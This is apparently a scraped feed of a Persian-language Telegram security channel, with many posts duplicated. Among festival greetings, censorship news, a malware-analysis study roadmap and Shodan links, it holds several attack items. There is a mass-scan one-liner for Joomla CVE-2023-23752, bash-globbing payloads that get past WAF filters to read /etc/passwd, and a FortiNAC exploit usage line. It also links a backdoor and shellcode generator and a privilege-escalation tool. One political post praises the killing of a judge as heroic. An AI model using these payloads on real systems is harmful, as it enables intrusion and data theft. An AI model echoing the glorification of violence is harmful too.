CVE-2023-23752
Joomla webservice endpoint access
PoC
#cve
@pfksecurity
Joomla webservice endpoint access
PoC
httpx -l ip.txt -path '/api/index.php/v1/config/application?public=true'#cve
@pfksecurity
🔥 اسپندگان فرخ باد 🔥
💠 جشن اسپندگان، روز اسپند از ماه اسپند، یکی از جشن های باستانی ایران است که برابر گاهشماری زرتشتی که دوازده ماه ۳۰ روزه دارد، پنجمین روز در ماه اسپند بوده ولی در تقویم ایران که خورشیدی است و شش ماه نخست سال ۳۱ روز دارد، روز ۲۹ بهمن خورشیدی جای گرفته است و این شش روز اختلاف میان گاهشماری زرتشتی و خورشیدی به خاطر همان شش ماه نخست سی و یک روزه در گاهشمار خورشیدی است.
💠 واژه «اسپند» در اوستا به ریخت (شکل) «سپندارمز» آمده و در سرودهای زرتشت (گاتها) «سپَنتَ آرمَیتی» است. سپنته به معنی مقدس و آرمیتی به معنی آرمان و اشغ (عشق) پاک است. این ویژگی، چهارمین گام رازوری (عرفان) در باور مزدیسنان بوده و یکی از فروزه های برگرفته از راز اهورامزدا است. سپنته آرمیتی در جهان مینُوی، نماد بردباری، فروتنی، فدا شدن و از خود گذشتگی است و از آنجا که این ویژگی های نیک را بیشتر در بانوان می توان مشاهده کرد، این جشن را به زنان نسبت داده اند و چون برخی از ویژگی های بانوان مانند زایندگی، پروراندن، فروتنی و شکیبایی را زمین نیز در خود دارد، جشن اسپندگان جشن پاسداشت زمین و بزرگداشت جایگاه زنان نیک است.
در گاهشماری ترادادی (سنتی) زرتشتی، دوازدهمین ماه از سال و پنجمین روز از هر ماه «اسپند» نام دارد، از این روی در روز اسپند از ماه اسپند، پیش از فرا رسیدن بهار و پیدایش گل و گیاه همراه با شور اشغ در هستی، بالندگی زاستار (طبیعت) و نوشدن زمین «جشن اسفندگان» بر پا می گردد.
💠 بانوان ایرانی در جشن اسپندگان، پس از نیایش، پوشش نو بر تن کرده، خود را می آراستند. در چنین روزی دست از کار همیشگی کشیده به شادی و پایکوبی می پرداختند. دختران و بانوان در جشن اسپندگان دسته های گل را به آغوش می گرفتند که شایستگی آن را داشته باشند.
🔥 جشن اسپندگان،
روز اسپند از ماه اسپند،
گاه بزرگداشت زنان،
هنگام پاسداشت زمین،
گاه رهایی و شادی بانوان،
جلوه گاه آرمان و اشغ پاک،
روز مادر، روز مهر،
پیشاپیش
بر بانوان مهر پرور گیتی فرخنده باد.
#اسفندگان
#سپندارمز
#سپندارمزگان
#جشن_های_ایرانی
@pfksecurity
💠 جشن اسپندگان، روز اسپند از ماه اسپند، یکی از جشن های باستانی ایران است که برابر گاهشماری زرتشتی که دوازده ماه ۳۰ روزه دارد، پنجمین روز در ماه اسپند بوده ولی در تقویم ایران که خورشیدی است و شش ماه نخست سال ۳۱ روز دارد، روز ۲۹ بهمن خورشیدی جای گرفته است و این شش روز اختلاف میان گاهشماری زرتشتی و خورشیدی به خاطر همان شش ماه نخست سی و یک روزه در گاهشمار خورشیدی است.
💠 واژه «اسپند» در اوستا به ریخت (شکل) «سپندارمز» آمده و در سرودهای زرتشت (گاتها) «سپَنتَ آرمَیتی» است. سپنته به معنی مقدس و آرمیتی به معنی آرمان و اشغ (عشق) پاک است. این ویژگی، چهارمین گام رازوری (عرفان) در باور مزدیسنان بوده و یکی از فروزه های برگرفته از راز اهورامزدا است. سپنته آرمیتی در جهان مینُوی، نماد بردباری، فروتنی، فدا شدن و از خود گذشتگی است و از آنجا که این ویژگی های نیک را بیشتر در بانوان می توان مشاهده کرد، این جشن را به زنان نسبت داده اند و چون برخی از ویژگی های بانوان مانند زایندگی، پروراندن، فروتنی و شکیبایی را زمین نیز در خود دارد، جشن اسپندگان جشن پاسداشت زمین و بزرگداشت جایگاه زنان نیک است.
در گاهشماری ترادادی (سنتی) زرتشتی، دوازدهمین ماه از سال و پنجمین روز از هر ماه «اسپند» نام دارد، از این روی در روز اسپند از ماه اسپند، پیش از فرا رسیدن بهار و پیدایش گل و گیاه همراه با شور اشغ در هستی، بالندگی زاستار (طبیعت) و نوشدن زمین «جشن اسفندگان» بر پا می گردد.
💠 بانوان ایرانی در جشن اسپندگان، پس از نیایش، پوشش نو بر تن کرده، خود را می آراستند. در چنین روزی دست از کار همیشگی کشیده به شادی و پایکوبی می پرداختند. دختران و بانوان در جشن اسپندگان دسته های گل را به آغوش می گرفتند که شایستگی آن را داشته باشند.
🔥 جشن اسپندگان،
روز اسپند از ماه اسپند،
گاه بزرگداشت زنان،
هنگام پاسداشت زمین،
گاه رهایی و شادی بانوان،
جلوه گاه آرمان و اشغ پاک،
روز مادر، روز مهر،
پیشاپیش
بر بانوان مهر پرور گیتی فرخنده باد.
#اسفندگان
#سپندارمز
#سپندارمزگان
#جشن_های_ایرانی
@pfksecurity
دسترسی به شبکه Cloudflare از ساعاتی پیش در بسیاری از ISPهای داخل #ایران محدود شده است.
https://twitter.com/NarimanGharib/status/1627004712678457344
https://twitter.com/NarimanGharib/status/1627004712678457344
X (formerly Twitter)
Nariman Gharib (@NarimanGharib) on X
Access to @Cloudflare network has been restricted in many ISPs inside #Iran since a few hours ago.
#Filternet
#Filternet
This media is not supported in your browser
VIEW IN TELEGRAM
جشن سپندارمذگان جشن اصیل ایرانی (روز عشق به تاریخ ایران باستان)
نه به ولنتاین و فرهنگ غربی
درود بر فرهنگ اصیل ایرانی
۱۹ فوریه روز سپندارمذگان رو تبریک عرض مینماییم
#جشن #جشن_های_ایرانی
@PfkSecurity
نه به ولنتاین و فرهنگ غربی
درود بر فرهنگ اصیل ایرانی
۱۹ فوریه روز سپندارمذگان رو تبریک عرض مینماییم
#جشن #جشن_های_ایرانی
@PfkSecurity
⌨ بایپس فایروال برنامه وب (WAF) با globbing
Bash
می تواند جایگزینی نام فایل را انجام دهد، پروسسی به نام "globbing"، اما از مجموعه استاندارد عبارات منظم استفاده نمی کند.
اگر یک WAF (فایروال برنامه وب) وجود دارد که پیلودهای RCE (اجرای کد از راه دور) و LFI (شامل فایل محلی) را فیلتر می کند، می توانید با جایگزینی آن را دور بزنید.
به عنوان مثال:
/usr/bin/cat /etc/passwd == /???/???/c?t$IFS/?t?/p?s?wd
? = هر شخصیت واحد
* = هر رشته ای، از جمله یک رشته با طول صفر!
$IFS =
جداکننده فیلد داخلی در سیستم های یونیکس = فضا، تب یا خط جدید
به عنوان مثال، تمام ورودی های زیر باید "/bin/cat /etc/passwd" را در یک سیستم لینوکس معمولی انجام دهند:
/*/?at$IFS/???/???swd
/****/?at$IFS/???/*swd
/**/?at$IFS/???/**swd
می تونی امتحان کنی!
#web
@pfksecurity
Bash
می تواند جایگزینی نام فایل را انجام دهد، پروسسی به نام "globbing"، اما از مجموعه استاندارد عبارات منظم استفاده نمی کند.
اگر یک WAF (فایروال برنامه وب) وجود دارد که پیلودهای RCE (اجرای کد از راه دور) و LFI (شامل فایل محلی) را فیلتر می کند، می توانید با جایگزینی آن را دور بزنید.
به عنوان مثال:
/usr/bin/cat /etc/passwd == /???/???/c?t$IFS/?t?/p?s?wd
? = هر شخصیت واحد
* = هر رشته ای، از جمله یک رشته با طول صفر!
$IFS =
جداکننده فیلد داخلی در سیستم های یونیکس = فضا، تب یا خط جدید
به عنوان مثال، تمام ورودی های زیر باید "/bin/cat /etc/passwd" را در یک سیستم لینوکس معمولی انجام دهند:
/*/?at$IFS/???/???swd
/****/?at$IFS/???/*swd
/**/?at$IFS/???/**swd
می تونی امتحان کنی!
#web
@pfksecurity
از چه ابزارهای آزمایش اکسپلویت برای تشخیص آسیبپذیریها استفاده میکنید؟
من میدانم که مردم از پایگاههای اطلاعاتی exploit مانند exploit-db استفاده میکنند، اما شما از چه ابزارهایی برای تشخیص اینکه چه اکسپلویتها هستند بدون شکستن سیستم استفاده میکنید؟
بحث در :
https://t.iss.one/+114BerAH5lo1ODM0
من میدانم که مردم از پایگاههای اطلاعاتی exploit مانند exploit-db استفاده میکنند، اما شما از چه ابزارهایی برای تشخیص اینکه چه اکسپلویتها هستند بدون شکستن سیستم استفاده میکنید؟
بحث در :
https://t.iss.one/+114BerAH5lo1ODM0
بکدور و سازنده shellCode برای معماری های مختلف (0x001)
https://github.com/doudoudedi/hackEmbedded#install
#Shellcode #Backdoor
@pfksecurity
https://github.com/doudoudedi/hackEmbedded#install
#Shellcode #Backdoor
@pfksecurity
«هکرهای جمهوری اسلامی»، فرزین کریمی و سید مجتبی مصطفوی، بنیانگذارهای آکادمی راوین وابسته به وزارت اطلاعات امروز توسط اتحادیه اروپا تحریم شدند.
#راوین
#NarimanGharib
@PfkSecurity
#راوین
#NarimanGharib
@PfkSecurity
Forwarded from Private Shizo
CVE-2022-39952_PoC.zip
2 KB
🔥🔥🔥Fortinet FortiNAC CVE-2022-39952 Deep-Dive, PoC and IOCs
An external control of file name or path vulnerability [CWE-73] in FortiNAC webserver may allow an unauthenticated attacker to perform arbitrary write on the system.
🔖PoC exploit here
Usage:
An external control of file name or path vulnerability [CWE-73] in FortiNAC webserver may allow an unauthenticated attacker to perform arbitrary write on the system.
🔖PoC exploit here
Usage:
python3 CVE-2022-39952.py --target IP --file payload«نباید بترسم؛ ترس قاتل ذهن است. ترس، مرگ کوچکی است که به ویرانی تام و تمام میانجامد. با ترسم روبهرو میشوم و میگذارم از من، از درون من بگذرد؛ و چون گذشت، چشم درونم را به راهش میگردانم. در آنجا که ترس رفته هیچ نمیبینم، فقط منم که برجای میمانم.»
@pfksecurity
@pfksecurity
بحث در گروه :
https://t.iss.one/+114BerAH5lo1ODM0
نقشه راه برای انالیز بدافزار طبق نظر اقای علی امینی
1 - مباحث سیستم عامل رو یاد بگیرید حالا هر کتابی که خوندید .
2 - لینوکس را یاد بگیرید ( Lpic1 ) کافیه ولی بیشتر معماری یاد بگیرید .
3 - Network +
خواستید میتونید Cisco بکنید زیاد وسواس به خرج ندید .
4 - زبان C رو یاد بگیرید .
5 - زبان اسمبلی که اصل و پایه و اصول این علمه
دانلود کتاب اسمبلی
The Art Of Assembley Language
6 - Reversing : Secrets of reverse engineering
7 - Reverse for Beginners
8 - با انجام تحلیل و تمرین و انجام چلنچ های crackme میتونید خودتون تقویت کنید .
9 - توصیه من اینه که حتما یه مدت زیادی رو بعد از خوندن کتاب بزارید برا تمرین.
خب حالا تو این مرحله شما یه زمینه خوبی پیدا کردید و میتونید یه شاخه انتخاب کنید:
تحلیل بدافزار، تحلیل فایل های سیستم عامل ، و یا تحلیل فریم ور ها.
کتاب برا تحلیل بدافزار:
Practical malware analysis
10 - در ادامه چلنچ حل کنید ولی توصیه من اینه که بدافزار واقعی تحلیل کنید این میتونه توی درک شما از حملات واقعی خیلی موثر باشه .
11 - و در انتها این کتابی که میگم برا کسایی خوبه که میخوان اکسپلویت هم کار کنن. جدایی از اکسپلویت این کتاب خیلی دید خوبی بهتون میده. من انقد این کتابو دوست دارم که همیشه باز میکنم یه نگاهی میندازم بهش.
Art of explotion edition 2
#Malware_Analysis
#roadmap
اگر در این زمینه تجربه دارید میتونید در گروه رودمپ خودتون رو بزارید .
@PfkSecurity
https://t.iss.one/+114BerAH5lo1ODM0
نقشه راه برای انالیز بدافزار طبق نظر اقای علی امینی
1 - مباحث سیستم عامل رو یاد بگیرید حالا هر کتابی که خوندید .
2 - لینوکس را یاد بگیرید ( Lpic1 ) کافیه ولی بیشتر معماری یاد بگیرید .
3 - Network +
خواستید میتونید Cisco بکنید زیاد وسواس به خرج ندید .
4 - زبان C رو یاد بگیرید .
5 - زبان اسمبلی که اصل و پایه و اصول این علمه
دانلود کتاب اسمبلی
The Art Of Assembley Language
6 - Reversing : Secrets of reverse engineering
7 - Reverse for Beginners
8 - با انجام تحلیل و تمرین و انجام چلنچ های crackme میتونید خودتون تقویت کنید .
9 - توصیه من اینه که حتما یه مدت زیادی رو بعد از خوندن کتاب بزارید برا تمرین.
خب حالا تو این مرحله شما یه زمینه خوبی پیدا کردید و میتونید یه شاخه انتخاب کنید:
تحلیل بدافزار، تحلیل فایل های سیستم عامل ، و یا تحلیل فریم ور ها.
کتاب برا تحلیل بدافزار:
Practical malware analysis
10 - در ادامه چلنچ حل کنید ولی توصیه من اینه که بدافزار واقعی تحلیل کنید این میتونه توی درک شما از حملات واقعی خیلی موثر باشه .
11 - و در انتها این کتابی که میگم برا کسایی خوبه که میخوان اکسپلویت هم کار کنن. جدایی از اکسپلویت این کتاب خیلی دید خوبی بهتون میده. من انقد این کتابو دوست دارم که همیشه باز میکنم یه نگاهی میندازم بهش.
Art of explotion edition 2
#Malware_Analysis
#roadmap
اگر در این زمینه تجربه دارید میتونید در گروه رودمپ خودتون رو بزارید .
@PfkSecurity
Telegram
F.P.W Library Sec [ CyberSecurity Book ]
Book name: The art of assembly language
Year: 2010
Language: English
Pages: 764
#Programming #assembly
#hardware
=======================
t.iss.one/library_sec 🌿
Year: 2010
Language: English
Pages: 764
#Programming #assembly
#hardware
=======================
t.iss.one/library_sec 🌿
ExploitLeakedHandle
ابزاری است که دستههایی را در پروسس های غیرمجاز که ممکن است از یک پروسس والد ممتاز به ارث رسیده باشند را شناسایی میکند و تلاش میکند تا از آنها برای افزایش دسترسی لوکال استفاده کند.
https://github.com/0x00Check/ExploitLeakedHandle
@PfkSecurity
ابزاری است که دستههایی را در پروسس های غیرمجاز که ممکن است از یک پروسس والد ممتاز به ارث رسیده باشند را شناسایی میکند و تلاش میکند تا از آنها برای افزایش دسترسی لوکال استفاده کند.
https://github.com/0x00Check/ExploitLeakedHandle
@PfkSecurity
GitHub
GitHub - 0x00Check/ExploitLeakedHandle: Identify and exploit leaked handles for local privilege escalation.
Identify and exploit leaked handles for local privilege escalation. - 0x00Check/ExploitLeakedHandle
APK-Penetration-testing-Guide
https://github.com/RajQureshi/APK-Penetration-testing-Guide
@PfkSecurity
https://github.com/RajQureshi/APK-Penetration-testing-Guide
@PfkSecurity
GitHub
GitHub - RajQureshi/APK-Penetration-testing-Guide: The Android Penetration Testing Steps repository is intended for security professionals…
The Android Penetration Testing Steps repository is intended for security professionals, penetration testers, developers, and anyone who is interested in understanding the security implications of ...
‼️ #مجید_کاووسیفر دلاور یک قاضی جنایتکار را در سال ۱۳۸۴ در تهران هیچ کرد و این صحنه حماسی رو چندثانیه قبل از اعدام شدنش خلق کرد...
وی تا لحظه اعدام اظهار پشیمانی نکرد و با شادی و سرور به پای چوبه دار رفت.
قاضی مرتضوی چندی پیش از اجرای حکم آنها گفت: «تا همین لحظهٔ آخر، این اشخاص به هیچ وجه از کردههایشان پشیمان نبودند و میگفتند، میخواستیم آنقدر مسئول و قاضی در این مملکت هیچ کنیم تا اشک رئیس قوهٔ قضاییه در بیاید».
حکم اعدام مجید قهرمان توسط ابوالقاسم صلواتی جنایتکار صادر شد.
این یعنی تا آخرین لحظه: مقاومت مقاومت مقاومت
#انقلاب_ایران
#قیام_تا_سرنگونی
.چهارشنبه ۵ بهمن ۱۴۰۱
🔴این #انقلابیست_تا_پیروزی
@PfkSecurity
وی تا لحظه اعدام اظهار پشیمانی نکرد و با شادی و سرور به پای چوبه دار رفت.
قاضی مرتضوی چندی پیش از اجرای حکم آنها گفت: «تا همین لحظهٔ آخر، این اشخاص به هیچ وجه از کردههایشان پشیمان نبودند و میگفتند، میخواستیم آنقدر مسئول و قاضی در این مملکت هیچ کنیم تا اشک رئیس قوهٔ قضاییه در بیاید».
حکم اعدام مجید قهرمان توسط ابوالقاسم صلواتی جنایتکار صادر شد.
این یعنی تا آخرین لحظه: مقاومت مقاومت مقاومت
#انقلاب_ایران
#قیام_تا_سرنگونی
.چهارشنبه ۵ بهمن ۱۴۰۱
🔴این #انقلابیست_تا_پیروزی
@PfkSecurity
🔎 Shodan online tools 🔍
https://shodan.io
https://beta.shodan.io
https://trends.shodan.io
https://icsmap.shodan.io
https://ics-radar.shodan.io
https://ics-apac-2017.shodan.io
https://exploits.shodan.io
https://developer.shodan.io
https://images.shodan.io
https://datapedia.shodan.io
https://chrono.shodan.io
https://snippets.shodan.io
https://geonet.shodan.io
https://faviconmap.shodan.io
https://honeyscore.shodan.io
https://internetdb.shodan.io
https://blog.shodan.io
https://monitor.shodan.io
https://2000.shodan.io
https://exposure.shodan.io
https://simple.shodan.io
https://maps.shodan.io
https://cli.shodan.io
https://malware-hunter.shodan.io
https://me.shodan.io
https://stats.uptimerobot.com/zvJNJFmoP
https://dlink-report.shodan.io/
@pfksecurity
https://shodan.io
https://beta.shodan.io
https://trends.shodan.io
https://icsmap.shodan.io
https://ics-radar.shodan.io
https://ics-apac-2017.shodan.io
https://exploits.shodan.io
https://developer.shodan.io
https://images.shodan.io
https://datapedia.shodan.io
https://chrono.shodan.io
https://snippets.shodan.io
https://geonet.shodan.io
https://faviconmap.shodan.io
https://honeyscore.shodan.io
https://internetdb.shodan.io
https://blog.shodan.io
https://monitor.shodan.io
https://2000.shodan.io
https://exposure.shodan.io
https://simple.shodan.io
https://maps.shodan.io
https://cli.shodan.io
https://malware-hunter.shodan.io
https://me.shodan.io
https://stats.uptimerobot.com/zvJNJFmoP
https://dlink-report.shodan.io/
@pfksecurity
Shodan
Search engine of Internet-connected devices. Create a free account to get started.